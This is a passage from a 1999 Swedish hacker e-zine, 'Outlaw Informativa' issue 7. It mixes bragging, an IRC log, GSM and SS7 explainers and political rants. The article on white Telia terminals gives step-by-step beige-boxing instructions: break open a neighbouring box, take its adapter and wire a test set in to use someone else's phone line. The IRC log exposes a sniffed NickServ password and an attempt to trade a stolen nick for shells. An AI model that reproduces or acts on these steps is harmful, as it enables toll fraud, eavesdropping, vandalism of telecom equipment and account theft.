1067 lines
47 KiB
Plaintext
1067 lines
47 KiB
Plaintext
-----BEGIN PGP SIGNED MESSAGE-----
|
|
Hash: SHA1
|
|
|
|
|
|
Heretics Inc. tar o presenterar....
|
|
|
|
|
|
|
|
|
|
|
|
|
|
[ Outlaw Informativa ]
|
|
|
|
issue 7, 99-09-08
|
|
|
|
___________________
|
|
|
|
O U T L A W 7
|
|
|
|
September 7, 1999
|
|
___________________
|
|
|
|
- A Heretics Inc. Production -
|
|
|
|
|
|
|
|
"Those who desire to give up freedom in order to gain
|
|
security, will not have, nor do they deserve, either
|
|
one".
|
|
-Thomas Jefferson
|
|
|
|
|
|
|
|
Nu ska jag (EDITOR) aka BLÄÄ skriva en liten intro och lite annat skit som
|
|
vi alltid brukar göra. Tja, nu är det regnigt och skitigt...det är såna dag-
|
|
ar man sitter och myser framför närmsta lilla Utvecklings miljö *mysa*
|
|
Nu vill jag uppmana alla att inte klaga på stackars crazy-train, han har så
|
|
inni helvete inte rippat nåt i artikeln om GSM.......jaja, Jag tror fan jag
|
|
tar och skiter i artikeln om Mellanförstärkare som jag snackade om i förra
|
|
numret. Jag kan för lite om dom och verkar ganska ointressanta. Hmm, just
|
|
fan...va gillade ni min GSM security artikel? c0l4..nää, det e lugnt du
|
|
behöver inte klaga på den; jag vet vad du tycker om allt jag gör, så är det
|
|
ju när man är FJÅRTIS !!..men kom ihåg 14 är en ålder och inte lixom en stil
|
|
eller typ av blod..ähh, skit samma. Jag har varit ute med Segelbåten också,
|
|
1 vecka dess verre..men de va skönt som fan men man längtade hem till datorn
|
|
och lukten av gata. Nu ut och haxxa VMS burkar nu. Jag är inte elajt jag är
|
|
bara 0nd och står för mitt citat 0ndska är Kärlek. Lite annat shit också,
|
|
o-i var ju förut men nu är det en blandning av seriöst och humor/ironi.
|
|
|
|
C:\> type C:\WINDOWS\SYS.LOG
|
|
|
|
Begin of Microsoft(C)(R)osv..osv..osv.., System LOG
|
|
|
|
Nope, no fraud on your .comp today just Bill Gates looking at funny porn
|
|
pics.
|
|
|
|
C:\>
|
|
|
|
Min humor är så dålig att den är bra, det är det som är poängen, snorrrk.
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
Disclaimer
|
|
-----------------------------------------------------------------------------
|
|
All denna skitiga information är bara till för utbildningssyfte och sånt
|
|
tjafs. Så du får fan ta ansvar för dina egna handlingar om du skulle
|
|
hamna i bur pågrund av utföringar av informationen som man faktiskt kan
|
|
läsa här. Kiss och Bajs ålder på oss som gömmer sig bakom en Disclaimer, det
|
|
är ju alltid bra att ha en...paranoid aka diox1de.
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
Medverkande
|
|
-----------------------------------------------------------------------------
|
|
Jo fan såklart man måste ha en lista på alla som är med och skriver till just
|
|
detta issue. ÄHHH...här är den !
|
|
|
|
|
|
Alias: diox1de Contact: keytrace@usa.net
|
|
¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
Alias: dthl Contact: #Phreakerz@DALnet
|
|
¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
Alias: ncode Contact: #swehack@DALnet
|
|
¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
Alias: crazy-train Contact: #Phreakerz@DALnet
|
|
¯¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
|
|
w w w . i n t e u p p e ä n . c o m
|
|
|
|
|
|
|
|
I N N E H Å L L S F Ö R L E K N I N G
|
|
|
|
|
|
|
|
¤ Staff
|
|
|
|
1:1 . Editor
|
|
1:2 . Disclaimer
|
|
1:3 . Medverkande
|
|
1:4 . Innehållsförlekning
|
|
1:5 . Aktuellt
|
|
1:6 . Outlaw Informativa söker skribenter
|
|
|
|
¤ Phreaking och Phelefoni
|
|
|
|
2:1 . Säkerhet i GSM systemet, del #2 av: diox1de
|
|
2:2 . GSM telefonen och dess funktion av: crazy-train
|
|
2:3 . SS7 - Den magiska signalen av: diox1de
|
|
2:3 . Adapter för vita terminaler av: dthl
|
|
2:4 . Polisen tvingar telebolagen, arghh av: diox1de
|
|
|
|
¤ Hacking, Networking och Unix
|
|
|
|
3:1 . msg'a kanalen du är bannad på av: diox1de
|
|
3:2 . Vem som helst kan läsa din Hotmejl av: diox1de
|
|
3:3 . 0ldschool Hacking: /etc/shadow av: diox1de
|
|
3:4 . Linux Säkerhet Administration av: diox1de
|
|
3.5 . Cisco kommando lista av: ncode
|
|
3:6 . Ethernet kort till Windows CE av: diox1de
|
|
3:7 . Svenska hackers hackade NASA, busted ! av: diox1de
|
|
|
|
¤ Bomber (Hjälp!)
|
|
|
|
4.1 . Svin lätt & rolig Bomb av: dthl
|
|
|
|
¤ Snusk och slut på numret
|
|
|
|
5:1 . Copyright
|
|
5:2 . 3x1t3d(), eller nåt
|
|
|
|
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
Aktuellt
|
|
-----------------------------------------------------------------------------
|
|
|
|
¤ Knash's nick övertaget
|
|
|
|
Knash fick reda på att hans nick blev övertaget runt midnatt den 31 august-
|
|
i. Den lilla fjårtis till lamer sig sig ha sniffat nickserv med ett elajt
|
|
h4xx0r program som han med självklarhet inte alls skrivit själv. Eftersom
|
|
nickserv skickar ident requests som är i form av kommandon i klartext så är
|
|
det fullt möjligt att sniffa nickserv. Knash har bytte nick temporärt till
|
|
dcrypt men har nu ett fast nick (diox1de) nuvarande diox1de snackade med
|
|
lamern som säger att hans orginala nick är [f]LASH, men inget är klargjort
|
|
än.
|
|
|
|
$ log beginning
|
|
|
|
knash^ (fIKUS@z2-1-76.sbbs2.net)
|
|
<knash^> jaha
|
|
<knash^> hejhej
|
|
<knash^> :)
|
|
<Dcrypt> vem e du ?
|
|
<knash^> åke
|
|
<knash^> å du ä knash
|
|
<knash^> dum du ä å ger bort ditt pass
|
|
<Dcrypt> det har jag inte gjrot
|
|
<Dcrypt> gjort even
|
|
<knash^> j
|
|
<knash^> o
|
|
<Dcrypt> hmm..skicka log
|
|
<knash^> jag ä ivil haxxor å snodde ditt nick
|
|
<knash^> :)
|
|
<Dcrypt> å så ivil du är, varför gjorde du det då?
|
|
<knash^> [Knash^(me@t3o29p13.telia.com)] identify secretcpp
|
|
<knash^> :)
|
|
<Dcrypt> sniffade du eller ?
|
|
<knash^> yeye... whatevah :)
|
|
<knash^> tycker att ni på #swehack ska sluta snacka om att ni ä så elit
|
|
hela tiden å göra nåt åt saken
|
|
<Dcrypt> hehe, jag har inte sagt att jag e l33t..
|
|
<knash^> tsss
|
|
<knash^> men du får inte tebax ditt nick iaf :)
|
|
<knash^> om jag får ett shell så fåru det
|
|
<knash^> :)
|
|
<Dcrypt> jag har inge shel
|
|
<Dcrypt> shell
|
|
<knash^> fixa då
|
|
<knash^> :)
|
|
<Dcrypt> ähh.
|
|
<knash^> jo
|
|
<Dcrypt> nej...Är du så lam så att du tar över nåns nick och utpressar per-
|
|
sonen så kan du lika gärna behålla det
|
|
<knash^> haha
|
|
<knash^> lam?
|
|
<knash^> vill ha mer shells juh!
|
|
<Dcrypt> då är det inte din dag i dag
|
|
<knash^> mohaha
|
|
<knash^> tar över nåns nick? det va juh du som gav det till mej
|
|
<Dcrypt> ja visst du
|
|
<Dcrypt> skicka loggen da
|
|
<knash^> har redan visat dej
|
|
<Dcrypt> bytt passwd har du gjort också, ännu mer elajt
|
|
<knash^> javet
|
|
<knash^> annars kan juh du ta tebax det :)
|
|
<Dcrypt> inte mot nåt shell iasfs
|
|
<knash^> tss
|
|
<knash^> haru nåt att trada då?
|
|
<knash^> ftp?
|
|
<Dcrypt> nepp, du får inget av mig iafs
|
|
<knash^> haha
|
|
<knash^> oOOoOo
|
|
<knash^> nuker
|
|
<Dcrypt> snacka inte skit om dig själv
|
|
<knash^> haha
|
|
<knash^> lamer
|
|
<Dcrypt> Har du kul ?
|
|
<knash^> ja
|
|
<knash^> :)
|
|
<knash^> bara så du vet så ä jag [f]LASH å fLAERP å jag sniffade nickserv
|
|
så jag har på alla som identifyade då
|
|
<knash^> :)
|
|
<Dcrypt> k, den där [f]LASH verkar inte kunna ett skit
|
|
<knash^> hehe
|
|
<knash^> ne javet
|
|
<knash^> han ä jätte lam
|
|
<knash^> ojoj
|
|
<knash^> d ä JAG dsom ä [f]LASH din nolla å jag ä mer elit än du nånsin
|
|
kommer bli
|
|
<knash^> :)
|
|
<Dcrypt> Du fattar inget, klart jag vet att flash e du..
|
|
<knash^> lamer du ä
|
|
<knash^> sluta snacka i gåtor då
|
|
<Dcrypt> eftersom du är så jävla l33t så borde du fatta hur man snackar.
|
|
<Dcrypt> Säg nåt du kan
|
|
<knash^> typ en massa.. lite c.. lite linux.. massa win :).. ganska lam men ändå
|
|
mer leet än du
|
|
<Dcrypt> skulle inte tro det
|
|
<Dcrypt> win är inget att kunna
|
|
<Dcrypt> Jag lovar du vet inte ens vad Public/Private key andvänds till
|
|
<Dcrypt> Jaja, bestäm själv..ge mig tillbaka nicket eller behåll det
|
|
<knash^> behåller
|
|
<Dcrypt> Jag lovar du vet inte ens vad Public/Private key andvänds till
|
|
<Dcrypt> Din fula lamer
|
|
<knash^> hihi
|
|
<Dcrypt> Jag lovar du vet inte ens vad Public/Private key andvänds till
|
|
<Dcrypt> !
|
|
|
|
Som ni ser så visste inte den som kallar sig [f]LASH (muwahah, lamt nick)
|
|
vad Public/Private key andvänds till.
|
|
|
|
-----------------------------------------------------------------------------
|
|
Outlaw Informativa söker skribenter
|
|
-----------------------------------------------------------------------------
|
|
Outlaw Informativa eller gruppen söker medlemmar som har hyffsad kunskap och
|
|
inte har nåt emot att skriva. Man ska ha fler kunskaper än Phreaking, vi vill
|
|
inte ha en massa lajta beige-boxers här. Outlaw Informativa har aldrig skriv-
|
|
it om hur man bygger en LMHS och kommer aldrig att göra.
|
|
|
|
Bra att kunna om du vill bli med:
|
|
Hacking (Nätverk, Bakdörrar etc) Unix (hur det funkar, säkerhet, nätverk)
|
|
Phreaking (Växlar, signalsystem etc) Programmering (t.ex. Assembler, C/C++,
|
|
Java osv) Kryptering (Nyckelhantering, algoritm strukturer osv)
|
|
|
|
Detta är absolut inga krav, men har du kunskaper kring detta är det stor
|
|
chans att du kan bli en av oss ;)..Så länge du har nåt att skriva om och
|
|
vet ditt syfte till att skriva och ger ut bra information sånt som folk
|
|
läser och inte kastar bort.
|
|
|
|
Maila keytrace@usa.net om du vill bli 0n3 0f us =)
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
Säkerhet i GSM systemet, del #2
|
|
-----------------------------------------------------------------------------
|
|
|
|
[Inledning]
|
|
|
|
I första delen om GSM säkerhet skrev jag om hjärtat "Subscriber Identity Aut-
|
|
hentication, hur det funkade teoretiskt och vilka algoritmer som andvändes
|
|
till vad. För att läsa den här delen behöver du lite förståelse för olika
|
|
element i kryptering, men jag kommer hjälpa till lite endå :P
|
|
|
|
[A5 i teorin]
|
|
|
|
A5 som ni kanske inte kommer ihåg (om inte, kolla Outlaw-06) krypterar tal
|
|
mellan 2 mobilphelefoner med nyckeln Ki, mkt mer behöver du inte fatta om du
|
|
vill ha en mer omfattande förklaring så läs outlaw-06, uhmm...damn jag står
|
|
och tjatar om outlaw-06 hela tiden...denna artikel är ju baserad på att man
|
|
läst Del #1. Observera att det här är delvis rippat eftersom jag själv inte
|
|
fattar riktigt allt, men texten är ju skriven för er :) Jo föressten det är
|
|
10% rippat så att ni inte tror att jag rippat 90% av den, beheeh.
|
|
|
|
A5 är ett "streamcipher" som skapas av tre LSFR (Linear Feedback Shift Regi-
|
|
ster) av graderna 19, 22 och 23.
|
|
|
|
Newbie note: Ett streamcipher är teknik vid kryptering, den krypterar en bit
|
|
i taget med hjälp av en keystream.
|
|
|
|
|
|
Klockkontrollen är en slags tröskel funktion av de mittersa bitarna i de tre
|
|
olika skift-registren.
|
|
|
|
|
|
Summan av graderna för skift-registren 64 (19+22+23) och då andvänds alltså
|
|
en 64-bits "session key" för att initiera regstren.
|
|
|
|
Newbie note: Session Key är en symmetrisk nyckel och det innebär att den
|
|
andvänds både vid kryptering och dekryptering.
|
|
|
|
|
|
Sen matas det 22-bitars ramnumret in i TDMA registret.
|
|
|
|
|
|
För varje TDMA skapas två 114-bitars keystreams sedan gör en XOR på Downlink
|
|
och Uplink (Trafiksignaler)
|
|
|
|
Newbie note: 890 och 915 MHz används för Uplink och 935 och 960 MHz för
|
|
downlink. Uplink menas kommunikationen mellan phelefon till ba-
|
|
sstation medans Downlink används för kommunikation i motsatt
|
|
riktning.
|
|
|
|
|
|
Säkerheten i detta beror på hur cepe man är. Har man inte tillräcklig längd
|
|
på nyckeln och hur passa bra "keystreams" är och hur slumässigt generard
|
|
den är.
|
|
|
|
Lite info här kanske är lite lik "Att förstå Telekommunikation" och det kan-
|
|
ske beror på att jag fått infon där ifrån.
|
|
|
|
[Slutord]
|
|
|
|
Mer om GSM Säkerhet kommer i Outlaw Informativa, issue #8 där jag hade tänkt
|
|
att ta upp mer om olika egenskaper i GSM systemt.
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
GSM telefonen och dess funktion
|
|
-----------------------------------------------------------------------------
|
|
En GSM-telefon kan beskrivas med ett blockschema.
|
|
Här kommer detta och det beskriver en GSM-telefon's sändare och mottagare.
|
|
|
|
|
|
|
|
_______
|
|
| GSM |
|
|
|Telefon|
|
|
|_______|
|
|
_____/ \_____
|
|
/ \
|
|
_______________|___ _____|________________
|
|
270 kbit/s --> [Moduleringssänadare]-------------[Mottagare/demodulering]
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
____________|___ _____|___
|
|
33,8kbit/s --> [Skur-formatering]-------------[Utjämnare]
|
|
¯¯¯¯¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯
|
|
______|___ _____|______
|
|
[Kryptering]-------------[Dekryptering]
|
|
¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯
|
|
________|___ _____|________
|
|
[Interleaving]-------------[Deinterleaving]
|
|
¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯¯¯
|
|
456bitar/20 ms --> ________|___ _____|_
|
|
22,8 kbit/s [Kanaldekoder]-------------[Decoder]
|
|
¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯
|
|
260bitar/20 ms --> ______|___ _____|______
|
|
13 kbit/s [Talkodning]-------------[Talavkodning]
|
|
¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯
|
|
160 samples * 8 bitar/20ms --> ____|___ _|_
|
|
[Segmentering] [D/A]
|
|
¯¯¯¯¯¯¯¯|¯¯¯ ¯|¯
|
|
8000 samples/s * 8 bitar --> _|_ _____|___
|
|
[A/D] [Högtalare]
|
|
¯|¯ ¯¯¯¯¯¯¯¯¯
|
|
____|___
|
|
[Mikrofon]
|
|
¯¯¯¯¯¯¯¯
|
|
|
|
|
|
Här nedanför kommer jag bara ta upp de mest intressantaste bitarna av blocks-
|
|
chemat.
|
|
|
|
|
|
Talkodningen-
|
|
Bithastigeten 64kbit/s för talöverföringen är en alldeles för stor informati-
|
|
onsmängd för tt effektivt uttnyttjande av nätet. Man inför talkodning vilket
|
|
innebär att man skapar en kopia av det mänskliga talorganet. Vårat talorgan
|
|
arbetar relativt långsamt och man kan utan alltför stor avvikelse från
|
|
verkligheten räkna med att det inte ändrar karaktär mer än ar 20 ms. Talet
|
|
analyseras under 20 ms. Med hjälp av motsvarande utrustning i mottagaren
|
|
omvandlas signalen till ett s k syntetiskt eller konstgjort tal. På detta
|
|
sätt kan överföringshastigheten minskas till 13 kbit/s.
|
|
|
|
Talkodningen är konstruerad för talsignaler och är inte lämplig för
|
|
överföring av andra signaler, t ex rena datasignaler från datorer och faxar
|
|
som är anslutna till mobiltelefonen. Dessa ansluts via ett särskilt modem.
|
|
Och signalerna passerar inte denna talkodaren som kortar ner överföringshast-
|
|
igheten, utan man kan köra på i c:a 64kbit/s.
|
|
|
|
Kanalkodningen-
|
|
Kanalkodningen innebär att man kan upptäcka och korrigera fel i den mottagna
|
|
bit-signalen. Det finns då ytterligare bitar tillgängliga, som används som
|
|
kontrollbitar eller checkbitar. Dessa bitar ger mottagaren möjlighet att
|
|
korrigera fel som uppstått, t ex på grund av störningar i överföringen.
|
|
|
|
Interleavingen-
|
|
Interleaving är en metod att ytterligare minska felen i överföringen. Kanalk-
|
|
odningen rättar kortvariga fel, fel i enstaka bitar Med interleaving kan mera
|
|
"långvariga" fel korrigeras, dvs interleavingen motverkar att flera bitar
|
|
följande varandra försvinner. Detta sker genom att den digitaliserade
|
|
signalens bitar inte sänds i logsk följd utan bitarna i ett 20 ms-block sänds
|
|
iväg i en annan följd, vilket gör att inte nånting stämmer.
|
|
|
|
Kryptering/Formatering-
|
|
Kryperingen ska fungera så att det ska vara "omöjligt" för utomstående att
|
|
avlyssna samtalet. I mobiltelefonens processor finns en krypteringsnyckel
|
|
lagrad. Var gång telefonen försöker registrera en ny postition eller koppla
|
|
upp ett samtal, kontrolleras abonnentens identitet. Från MSC skickas ett slu-
|
|
mptal till telefonen. Med hjälp av en algoritm som tillhör nyckeln beräknas
|
|
ett svar, som telefonerna skickar tillbaka till MSC och vidare till VLR som
|
|
kontrollerar att svaret är korrekt. Om svaret inte är korrekt, så finns
|
|
abonnemanget hos någon annan operatör eller
|
|
är av någon anledning inte längre giltigt.
|
|
|
|
När data sänds, krypteras dessa i telefonen med hjälp av den "inbyggda"
|
|
nyckeln och det översända slumptalet. Den krypterade signalen tas emot av
|
|
nätet, som omkyrpterar signalen så att den passar till mottagarens nyckel och
|
|
det slumptal som översänts till denna. Om allt är korrekt sker en dechifferi-
|
|
ng i mottagartelefonen.
|
|
|
|
Efter att meddelandet krypterats i sändartelefonen, sker något som kallas för
|
|
skur-formatering. Det betyder att informationen på läpmligt sätt kombineras
|
|
med information om den kanal som kommer att användas för sändningen.
|
|
|
|
Efter dessa ingrepp ligger datahastigheten på c:a 33,8 kbit/s.
|
|
|
|
Nu än sålänge har vi gått igenom det mest intressanta steg-för-steg i vad som
|
|
egenligen händer i din lilla nalle :)
|
|
|
|
Nu ska jag gå in lite djupare in på ämnet "Modulering/sändning":
|
|
|
|
Mobiltelefonen arbetar på frekvensområdet 900 MHz. Det aktuella frekvensområ-
|
|
det ligger mellan 890 och 915 MHz vid sändning och 935 och 960 MHz vid
|
|
mottagning. Frekvenskillnaden mellan den s k bärvågen vid sändning respektive
|
|
mottagning är 45 MHz. Avståndet mellan två kanaler ska vara 200 kHz. I
|
|
vardera sändningsriktningen finns därför totalt 124 kanaler att dela på. På
|
|
grund av att flera delar på dessa. 124 kanaler, har varje GSM-operatör i
|
|
Sverige 4,8 MHz, dvs 24 kanaler till förfogande för sin egna trafik.
|
|
|
|
Bärvågen, t ex 900 MHz, är en sinusformad signal som alstras på sändaren. Den
|
|
informationen som ska överföras, får på något sätt förändra bärvågen från
|
|
sändaren. Detta kan ske genom att amplituden, frekvens eller fasläget påverk-
|
|
as. Detta kallas för modulering som ni kanske vet :)
|
|
GSM använder en typ av fasmodulering. Bärvågen innehåller alltså en avikelse
|
|
från den ursprungliga sinuskurvan som motsvarar våran krypterade information.
|
|
Nu gäller det att utnyttja de 24 kanaler så effektivt som möjligt. Genom att
|
|
utnyttja en typ av timesharing kan 8 förbindelser etableras per kanal. Man
|
|
kan säga att varje sändningsperiod delas upp i 8 intervall och i ett sådant
|
|
placeras vår formaterade skur av krypterad information. Efter moduleringen är
|
|
datahastigheten 270 kbit/s Räckvidden är begränsad för en basstation och en
|
|
telefon är maximalt något tiotal km vid frekvenser av 900 MHz, kan samma
|
|
användas av flera basstationer utan att detta stör överföringen. Det gäller
|
|
endast att fördela kanalerna mellan basstatuinerna på ett intelligent sätt.
|
|
Varje basstation täcker en cell. Ett antal celler bildar tillsammans ett
|
|
cluser och tillgängliga kanaler fördelas på dessa celler. Detta innebär att
|
|
samma kanal används för övering av många samtal, och det är inte alls säkert
|
|
att sändande telefon och mottagande telefon använder samma kanal. Det viktiga
|
|
är att de akuella uppkopplingarna finns så långt ifrån varandra att de inte
|
|
stör varandra. Det innebär också att när du lämnar en cell, kan du, naturlig-
|
|
tvis automatiskt, kopplas om till en annan kanal under pågående samtal.
|
|
Aktuellt MSC sköter om kanalvalet.
|
|
|
|
Nätet-
|
|
Nu säger vi att din krypterade signal kommit ut på nätet. I det fasta telenä-
|
|
tet är överföringskapaciteten nästan obegränsad. Här förs den vidare till den
|
|
operatörs nät som den abonnent du anropat är ansluten till. Sedan förs den
|
|
vidare till den MSC som din talmottagare är uppkopplad till. Anpassningen är
|
|
kryptering sker till mottagarens kodnyckel och algoritm.
|
|
|
|
Ok nu har vi gått igenom sändnings-delen.
|
|
|
|
I nästa nummer av Outlaw Informativa ska jag skriva lite om mottagardelen,
|
|
vilket är lite mindre komplicerat.Ok nu skriver jag in vad alla förkortningar
|
|
jag använt betyder.
|
|
|
|
|
|
GSM = Global System for Mobile Communications, eller på svenska : globalt
|
|
mobil-kommunikationssystem.
|
|
|
|
NMT = Nordic Mobile Telephone System (analogt system, omtalat i 900 MHz
|
|
frekvensen om ni inte visste detta)
|
|
|
|
MSC = Mobile Switching System
|
|
VLR = Visitor Location Register = "besökregister".
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
[Grundläggande] SS7 - Den magiska signalen
|
|
-----------------------------------------------------------------------------
|
|
|
|
|
|
Innhåll:
|
|
¯¯¯¯¯¯¯¯
|
|
--> Inledning
|
|
--> in-band/out-band signalering
|
|
--> Associerad signalering
|
|
--> Olika funktions element i SS7
|
|
|
|
|
|
[Inledning]
|
|
|
|
SS7 är ett ett Digitalt Signallerings Nätverk som avänds för att koppla och
|
|
hantera kommunikationen på de allmäna telenätet, det kallas "Smart Network"
|
|
och menas att det har inbyggda funktioner i själva nätverket. SS7 är uppdelat
|
|
i olika delar och varje har sin egen funktion att hantera. Eftersom SS7 är
|
|
digitalt kan man andvända den till andra saker t.ex. D-kanalen för ISDN.
|
|
SS7 har också möjligheter att kunna överföra multimedia som bild, ljud och
|
|
data. Teletrafik och Datatrafik sänds över olika kanaler eftersom det är
|
|
olika krav på utrustning, datatrafik kräver grymmt mycket högre bandbredd än
|
|
teletrafik.
|
|
|
|
SS7 = Signalling Systems 7
|
|
|
|
|
|
[in-band/out-band signalering]
|
|
|
|
Från början va SS7 ett "multi frequency in-band- telephony signalling system"
|
|
men har nu ersatts med "common channel out-of-band signalling system"
|
|
Från början va det tänkt att SS7 bara skulle förnya den gamla tekniken att
|
|
koppla upp och hantera teletrafik men har nu fått andra andvändningsmöjlighe-
|
|
r, SS7 kan t.ex. transportera ISDN signaler som andvänds vid Internet-Kommun-
|
|
ikation. För att du ska förstå vad in-band och out-band signalling är måste
|
|
det finnas en enkelt förklaring och jag hoppar inte över nåt. In-band signal-
|
|
ling är när ALL information går genom samma. Out-band signalling är lite
|
|
annorlunda. Out-band signallning etablerar en separat digital kanal för
|
|
växling av signal information. Denna kanal kallas för "Signal Länk". Signal
|
|
Länkarna är till för att hantera all nödvändig information i signalering
|
|
mellan olika noder. Så, vad är det som är så bra med out-band signalering då?
|
|
|
|
--> out-band signalling tillåter transport med högre hastigheter med mer
|
|
data. 56kbps kan hantera data så grymt mycket snabbare en
|
|
"Multi Frequency Outpulsing"
|
|
|
|
--> out-band tillåter att starta signalering när som helst och var som
|
|
helst.
|
|
|
|
--> out-band gör det möjligt att signalera till olika funktioner i nätverk-
|
|
et där det inte är nån "Direct Trunk Connection".
|
|
|
|
|
|
[Associerad signalering]
|
|
|
|
En typ av associerad signalering
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|¯¯¯¯¯¯¯¯|***************************|¯¯¯¯¯¯¯¯|
|
|
| |¯¯¯¯| |***************************| |¯¯¯¯| |
|
|
| |Växel |***************************| |Växel | (Ful ASCII, by diox1de(C)
|
|
| | #1 | |***************************| | #2 | |
|
|
| | | |***************************| | | |
|
|
| |____| |---------------------------| |____| |
|
|
| | | |
|
|
¯¯¯¯¯¯¯¯ * = "Voice Trunk" ¯¯¯¯¯¯¯¯
|
|
- = "Signalling Link"
|
|
|
|
Associerad signalering funkar bra så länge växeln bara kraven för signalerin-
|
|
gen är mellan sig själv och andra växlar. "The North America implementers"
|
|
ville designa ett SS7 nätverk som gjorde det möjligt att vilken "node" som
|
|
helst skulle kunna växla signaler med vilken övrig SS7 kabel node" som helst.
|
|
Fast Associerad Signalering blir mycket mer kompilcerat när man ska växla
|
|
signaler mellan olika "noder" som inte har någon fast anslutning.
|
|
|
|
|
|
[Olika funktions element i SS7]
|
|
|
|
SSP : Service Switching Points
|
|
Är en telefon-växel med inbyggd mjukvara för Signallings Systems 7 och
|
|
Hanterar uppkopplingar och addressering av anrop. Kan också andvändas
|
|
för att ställa frågor till en Central databas (SCP) om vilken väg
|
|
en förbindelse ska kopplas upp vid. SSP är själva porten till SS7 näte-
|
|
t.
|
|
|
|
STP : Signal Transfer Points
|
|
Hanterar nätverkstrafiken mellan olika signalerpunkter. STP kollar
|
|
information i SS7 paketen för att veta var den ska vidarbefoga paketet.
|
|
Detta kan vara en liknelse hur en HUB arbetar. En signalpunkt andvänder
|
|
en "Routing table" för att veta var paketet ska någon stanns.
|
|
|
|
SCP : Service Control Points
|
|
Är en typ av databas som kan kolla information och verifiera t.ex.
|
|
kreditkort.
|
|
|
|
[Efterord]
|
|
|
|
Hoppas du fattade nåt iafs..och sen får jag inte glömma källa satt inga idio-
|
|
ter får för sig att jag rippar =)
|
|
Jag gjorde det väldigt grundläggande nu, faktiskt så började jag skriva avan-
|
|
cerat hur nätet fungerade och vilket element som kommunicerade med vilket men
|
|
eftersom jag inte alls lyckades med att göra en tydlig ascci bild så blev det
|
|
inget av det, om du skickar nåt liten dos program till mig som kollar alla
|
|
pixlar och sånt och formar om en bild till ascii så kan jag nog ta mig i
|
|
kragen och skriva en avancerad del.
|
|
|
|
Maybe be to continued...
|
|
|
|
Källa: --> Att första Telekommunikation
|
|
--> Illumient, Signalling Systems 7.
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
Adapter för vita terminaler
|
|
-----------------------------------------------------------------------------
|
|
Ok, nu börjar vi då. Den vita terminalen är en förnyad version av den "gamla"
|
|
svarta terminalen med skruvar. Nuförtiden så byts en del gamla terminaler ut
|
|
mot de nya, därför telia gör detta är att förhindra missbruk, fast det är ju
|
|
lätt att gå igenom det ändå. I bland så sitter det adapters på vit terminale-
|
|
n, ( adaptern gör beige-boxing från vita lätt som en plätt ) jag tror att
|
|
adaptern är till för linjemannens special lmhs, det brukar sitta en adapter
|
|
på nästan alla vita terminaler, men sitter det ingen adapter där du ska beiga
|
|
så är det bara att bryta upp en annan japp och ta lös adaptern och sätta den
|
|
på den viting som du ska abusa. De flesta vet hur en vit terminal, om du inte
|
|
vet det så kan du ta en titt på vsp's bildarkiv och vet du inte hur en
|
|
adapter så kan du kolla på den hära fina ascii bilden:
|
|
|
|
_______ _______
|
|
/ | | \
|
|
| |_________________________________________| |
|
|
| ___/ \___ |
|
|
| | ____ _____ _____ _____ _____ _____ | |
|
|
| |___ | | | | | | | | | | | | ___| |
|
|
| \ |___| |___| |___| |___| |___| |___| / |
|
|
| |__________________________________________| |
|
|
| | | |
|
|
\_______ ____/
|
|
|
|
Jag vet att denna bild inte säger så mycket men jag ska fota en sedan, fast
|
|
här är lite mer fakta om adaptern, den är grå och på ovan sidan står det:
|
|
A952 7569 8840. På varje adapter finns det 10 linjer ( som på vita och svarta
|
|
terminaler ) och alltså 20 hål. Du löddar/binder fast nålar eller två små
|
|
plåtbitar på beige linan och stoppar in två hål. Sådär ja! nu har du lärt dej
|
|
hur man beigar från vitingar.
|
|
|
|
// dThl
|
|
|
|
[Knash fyller i: Finns på bild på adapter på:
|
|
http://members.xoom.com/firecrew/pics/vit.jpg]
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
Polisen tvingar telebolagen, arghh
|
|
-----------------------------------------------------------------------------
|
|
Farbror blå suger stock ! klart att det alltid finns en väg ut men nu ska
|
|
snuten försämra för oss, dom tvingar Telebolagen att dom också ska kunna ha
|
|
access till att avlyssna krypterade samtal och få fram klartext. Det ska
|
|
alltså finnas en massa onödig hårdvara och program för att få encrypted till
|
|
cleartext, uurk. På riksdagens fula bord ligger det redan ett fult lagförslag
|
|
(proposition 1994/95:227) om ändring av rättegångsbalken) .....det börjar bli
|
|
sorgligt nu. Jäjä, vi kan väl skaffa en algoritm som är omöjlig att forcera.
|
|
Men hur lång tid kommer det ta ? ..och hur många fattar så mycket att de kan
|
|
va med ? inte speciellt många, inte heller jag...Nu pallar inte jag mer arti-
|
|
keln e slut kanske.
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
msg'a kanalen du är bannad på
|
|
-----------------------------------------------------------------------------
|
|
Jag satt och plinkade på IRC och diskuterade på #Nuke.se hur allvarligt DoS
|
|
egentligen är, nä....men de enda intressanta med DoS är hur det funkar...
|
|
TCP/IP, UDP osv. är ju inte byggda för att kunna krasha andra hosts. Sen blev
|
|
jag ju bannad såklart sen testade jag skriva /msg #nuke.se nuke l337s...jao
|
|
och det funkade, vetta fan om det är inbyggt eller om det är en bug. Låt oss
|
|
säga att det är en bug, mkt roligare så. Ja men vi synns på #2,000. Hmm, läg-
|
|
